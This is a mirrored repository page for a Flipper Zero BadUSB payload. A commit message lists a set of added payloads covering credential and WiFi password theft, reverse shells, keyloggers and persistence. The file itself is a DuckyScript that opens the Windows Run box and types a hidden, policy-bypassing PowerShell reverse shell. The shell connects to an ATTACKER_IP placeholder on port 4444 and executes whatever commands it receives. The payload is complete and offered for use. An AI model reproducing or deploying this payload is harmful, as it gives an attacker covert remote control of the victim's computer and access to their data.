mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-17 07:13:18 +00:00
4f61dec96b
Added 25 BadUSB payloads for Flipper Zero: - System reconnaissance (Windows/Linux/Mac) - Credential extraction & WiFi password stealing - Reverse shells (PowerShell & Bash) - Defense evasion & persistence - Data exfiltration (keylogger, webcam, clipboard) - Harmless pranks All payloads include proper headers and documentation. Cross-platform support for Windows, Linux, and macOS.
12 lines
633 B
Plaintext
12 lines
633 B
Plaintext
REM ========================================
|
|
REM NullSec Flipper Zero BadUSB
|
|
REM Payload: PowerShell Reverse Shell
|
|
REM Target: Windows 10/11
|
|
REM ========================================
|
|
REM CONFIGURE: Change ATTACKER_IP and PORT
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -w hidden -nop -ep bypass -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length)}"
|
|
ENTER
|